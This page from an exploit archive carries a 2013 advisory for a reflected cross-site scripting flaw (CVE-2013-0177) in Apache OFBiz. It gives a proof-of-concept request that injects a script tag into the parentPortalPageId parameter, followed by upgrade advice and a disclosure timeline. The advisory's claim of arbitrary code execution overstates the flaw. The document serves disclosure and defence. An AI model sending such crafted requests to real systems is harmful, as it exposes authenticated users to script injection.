exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Apache OFBiz Cross Site Scripting

Apache OFBiz Cross Site Scripting
Posted Jan 20, 2013
Authored by Marcos Garcia, Juan Caillava

Apache OFBiz versions 10.04.05 and below and 11.04.01 and below suffer from a reflected cross site scripting vulnerability. Full exploitation details provided.

tags | exploit, xss
advisories | CVE-2013-0177
SHA-256 | de3b53f54188361189213bbc769aa0b03d6bdceb3374bb700d55cbda2a8f3328

Apache OFBiz Cross Site Scripting

Change Mirror Download
Title: Cross-Site Scripting (XSS) Vulnerability in Apache OFBiz
Type: Remote
Author: Juan Caillava (@jcaillava) / Marcos Garcia (@artsweb)
CVE: CVE-2013-0177
Impact: Direct execution of arbitrary code in the context of Webserver user.
Release Date: 18.01.2013

Summary
=======

Apache Open For Business (Apache OFBiz) is an open source enterprise
resource planning (ERP) system. It provides a suite of enterprise
applications that integrate and automate many of the business processes of
an enterprise.

Description
===========

Reflected Cross-Site Scripting Vulnerability affecting Screenlet.title and
Image.alt Widget attributes because the content of these two elements is
not properly escaped.


Vendor
======

Apache ofbiz - http://ofbiz.apache.org/


PoC
===

It is worth mentioning that originally the resource was using the HTTP
method POST, but it was changed to GET to exploit it more easily.
Something important to remark is that for this attack to work, the victim
should be authenticated.

Below you can see how the URL is specially crafted to expose the issue:

Affected URL: https://10.10.10.14:8443/exampleext/control/ManagePortalPages->
parameter: parentPortalPageId==[XSS]

GET
/exampleext/control/ManagePortalPages?parentPortalPageId=EXAMPLE"><script>alert("xss")</script>
HTTP/1.1
Host: 10.10.10.14:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101
Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3
Connection: keep-alive
Referer:
https://10.10.10.14:8443/exampleext/control/main?externalLoginKey=EL367731470037
Cookie: JSESSIONID=C3E2C59FDC670DC004A562861681C092.jvm1;
OFBiz.Visitor=10002


Solution
========

10.04.* users should upgrade to 10.04.05
11.04.01 users should upgrade to 11.04.02


Vendor Status
=============

[08.01.2013] Vulnerability discovered.
[09.01.2013] Vendor informed.
[09.01.2013] Vendor replied.
[12.01.2013] Vendor reveals patch release date.
[18.01.2013] Public advisory.
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    0 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close